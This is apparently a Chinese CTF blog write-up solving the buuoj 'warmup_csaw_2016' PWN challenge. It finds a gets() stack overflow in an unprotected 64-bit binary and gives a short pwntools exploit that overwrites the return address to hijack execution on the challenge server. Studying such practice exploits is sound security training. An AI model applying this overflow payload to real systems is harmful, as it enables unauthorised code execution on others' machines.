buuoj warmup_csaw_2016 writeup

题目(三):
【题型】PWN
【题目】warmup_csaw_2016
【来源】(buuoj)https://buuoj.cn/challenges#warmup_csaw_2016
【思路】栈溢出
【具体步骤】
Step1:checksec指令查看,发现是一个没有任何保护的64位的程序。
在这里插入图片描述

Step2:将程序放到IDApro下进行静态分析。
在这里插入图片描述

Step3:查看main函数的伪代码(F5,如果被占用,就用Fn+F5),发现有一个gets函数,猜测是栈溢出,栈的大小是64个字节,但是v5的长度位0x48(0x48+0x08)。
在这里插入图片描述
在这里插入图片描述

Step4:编写exp,得到flag。
源码为:

from pwn import *
p=remote("node4.buuoj.cn",25286)
payload=b'A'*0x48+p64(0x40060D)
p.sendline(payload)
p.interactive()

在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值